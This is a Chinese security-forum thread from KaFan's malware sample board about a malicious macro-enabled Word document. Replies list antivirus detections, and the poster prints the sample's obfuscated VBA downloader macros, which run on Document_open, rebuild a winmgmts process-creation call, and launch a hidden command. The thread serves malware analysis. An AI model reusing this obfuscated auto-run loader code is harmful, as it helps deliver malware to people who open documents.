收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 #Macro enabled text document# (2020-8-19)
12
返回列表 发新帖
楼主: 川建国代理人
 收起左侧

[病毒样本] #Macro enabled text document# (2020-8-19)

[复制链接]
Kaspersky用户
发表于 2020-8-19 12:25:21 | 显示全部楼层
Avira高启发监控KILL

VBA/Dldr.Agent.ulyfz
回复

举报

anthonyqian
发表于 2020-8-19 12:33:57 | 显示全部楼层
诺顿

文件名: Form - Aug 13_ 2020.doc
威胁名称: ISB.Downloader!gen411
回复

举报

浪里个浪9527
头像被屏蔽
发表于 2020-8-19 13:49:44 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

非正规ID
发表于 2020-8-19 20:26:18 | 显示全部楼层
火绒miss了 这个 我没设置好么

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

川建国代理人
 楼主| 发表于 2020-8-19 21:33:49 | 显示全部楼层
非正规ID 发表于 2020-8-19 20:26
火绒miss了 这个 我没设置好么

这是样本的两组宏代码
  1. Function IMDJUpaeopphltw()
  2. NINEDrrlcnonxg = GVNCMjuwrsfqdhfvrt.Zoom
  3. Dim EWtaT3�EfeU As Integer
  4. EWtaT3�EfeU = 9
  5. Do While EWtaT3�EfeU < 9 + 4
  6. EWtaT3�EfeU = EWtaT3�EfeU + 6: DoEvents
  7. Loop
  8. BDLTVgidtlppbf = ChrW(NINEDrrlcnonxg + (100 + 35) / 9)
  9. Dim WHEWC0�GtsV As String
  10. WHEWC0�GtsV = Trim$("NZtncF7�")
  11. GSBAGyjqcarlijtzov = "832[sahj hui12t7gGG7&^6272 gasg671832[sahj hui12t7gGG7&^6272 gasg671w832[sahj hui12t7gGG7&^6272 gasg671i832[sahj hui12t7gGG7&^6272 gasg671nm832[sahj hui12t7gGG7&^6272 gasg671832[sahj hui12t7gGG7&^6272 gasg671gm832[sahj hui12t7gGG7&^6272 gasg671t832[sahj hui12t7gGG7&^6272 gasg671832[sahj hui12t7gGG7&^6272 gasg671" + BDLTVgidtlppbf + "832[sahj hui12t7gGG7&^6272 gasg671832[sahj hui12t7gGG7&^6272 gasg671:832[sahj hui12t7gGG7&^6272 gasg671w832[sahj hui12t7gGG7&^6272 gasg671in832[sahj hui12t7gGG7&^6272 gasg671832[sahj hui12t7gGG7&^6272 gasg6713832[sahj hui12t7gGG7&^6272 gasg6712832[sahj hui12t7gGG7&^6272 gasg671_832[sahj hui12t7gGG7&^6272 gasg671" + GVNCMjuwrsfqdhfvrt.VNMSCbhkbswxd + "832[sahj hui12t7gGG7&^6272 gasg671ro832[sahj hui12t7gGG7&^6272 gasg671832[sahj hui12t7gGG7&^6272 gasg671ce832[sahj hui12t7gGG7&^6272 gasg671s832[sahj hui12t7gGG7&^6272 gasg671s832[sahj hui12t7gGG7&^6272 gasg671"
  12. Dim Xw3�8�Ky1�w As Byte
  13. JTRGZuudmaoe = LJZNQeocxzskhgk(GSBAGyjqcarlijtzov)
  14. Dim KUm3Y4�w0�A As Integer
  15. KUm3Y4�w0�A = 4
  16. Do While KUm3Y4�w0�A < 4 + 8
  17. KUm3Y4�w0�A = KUm3Y4�w0�A + 8: DoEvents
  18. Loop
  19. Set XELFNsanjmetbgvs = CreateObject(JTRGZuudmaoe)
  20. Dim QXD As String
  21. QXD = Trim$("DHBnPjfiN")
  22. SFFGKnkzerisyyxloed = GVNCMjuwrsfqdhfvrt.YUJPTwbpnlntxrvohod.ControlTipText
  23. Dim m1�kpiV8�N As Variant
  24. MBDSHnxlzsgukznbr = SOJSRvsicutkiygw + (JTRGZuudmaoe + BDLTVgidtlppbf + GVNCMjuwrsfqdhfvrt.FZYKUjobbfsndyy.ControlTipText + SFFGKnkzerisyyxloed)
  25. Dim gs2�gnTcKiQ As String
  26. YRAEKhnpdofs = MBDSHnxlzsgukznbr + GVNCMjuwrsfqdhfvrt.VNMSCbhkbswxd
  27. Dim N0�Pb8� As Double
  28. Set DYWLWkdanjkucwoh = HAMVVfxmbsedquponf(YRAEKhnpdofs)
  29. Dim GqCGSFodc As String
  30. GqCGSFodc = Trim$("Mv1�f8�oY4�")
  31. LHNTPvakhsrbzzlo = Array(GXEKFlkuwnam + "CUKLXkcvdtjhkda DVIWGsjsdfwdzs ZXWPXqocblhdev", XELFNsanjmetbgvs. _
  32. Create(HHBPMawuqhwypo, VHKNTrsqekls, DYWLWkdanjkucwoh), ROYWKkjknncqot + "KYPEXakotlyqgg FLXGKmmlstlshuhxe")
  33. Dim ZWpUHiEAD As String
  34. ZWpUHiEAD = Trim$("VabiuX")
  35. End Function
  36. Function HAMVVfxmbsedquponf(APCZVessorwgiiclkvk)
  37. Set HAMVVfxmbsedquponf = CreateObject(APCZVessorwgiiclkvk)
  38. Dim yllcsJLnKV As Integer
  39. yllcsJLnKV = 9
  40. Do While yllcsJLnKV < 9 + 5
  41. yllcsJLnKV = yllcsJLnKV + 1: DoEvents
  42. Loop
  43. HAMVVfxmbsedquponf. _
  44. showwindow = LGFVGuhhafllucdwirs + IUXNWlmiculntr
  45. Dim a4�g As Object
  46. End Function
  47. Function LJZNQeocxzskhgk(WIMPPhqhyyiiuo)
  48. IGUZVdybluwpxheflc = WIMPPhqhyyiiuo
  49. Dim nGcyUDpZ As Byte
  50. BRRDNiufmwunj = Split _
  51. (IGUZVdybluwpxheflc, "832[sahj hui12t7gGG7&^6272 gasg671")
  52. Dim EA4�DwC5�rtA As Double
  53. TDQUBtrdlaref = ALKEDzdmhahzipllpe + Join(BRRDNiufmwunj, QRIRYviyeguxrcickym)
  54. Dim C7�Yg As String
  55. C7�Yg = Trim$("nCtJBfnGcy")
  56. LJZNQeocxzskhgk = TDQUBtrdlaref
  57. Dim kFPSyh As Object
  58. End Function
  59. Function HHBPMawuqhwypo()
  60. Dim ctRwWF As String
  61. ctRwWF = Trim$("dJSt4�f")
  62. Dim Hd2EFS7�2�e As String
  63. Hd2EFS7�2�e = Trim$("X8�CfRdv")
  64. Dim gbdGcnr As String
  65. gbdGcnr = Trim$("kYI")
  66. LJDODikarcwpjfelr = GVNCMjuwrsfqdhfvrt.TGYNXmnrevkohuwrk.Pages(vbOK).Tag
  67. Dim AhGo2�Y3�bo As String
  68. AhGo2�Y3�bo = Trim$("yo3�dOZdWK")
  69. HHBPMawuqhwypo = LJZNQeocxzskhgk(LJDODikarcwpjfelr)
  70. Dim B0�jUg As Integer
  71. B0�jUg = 9
  72. Do While B0�jUg < 9 + 1
  73. B0�jUg = B0�jUg + 1: DoEvents
  74. Loop
  75. End Function
复制代码
  1. Private Sub _
  2. Document_open()
  3. GVNCMjuwrsfqdhfvrt.IMDJUpaeopphltw
  4. End Sub
复制代码
一般打开都会报错,但其实已经感染了

回复

举报

12
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-2 20:18 , Processed in 0.094146 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表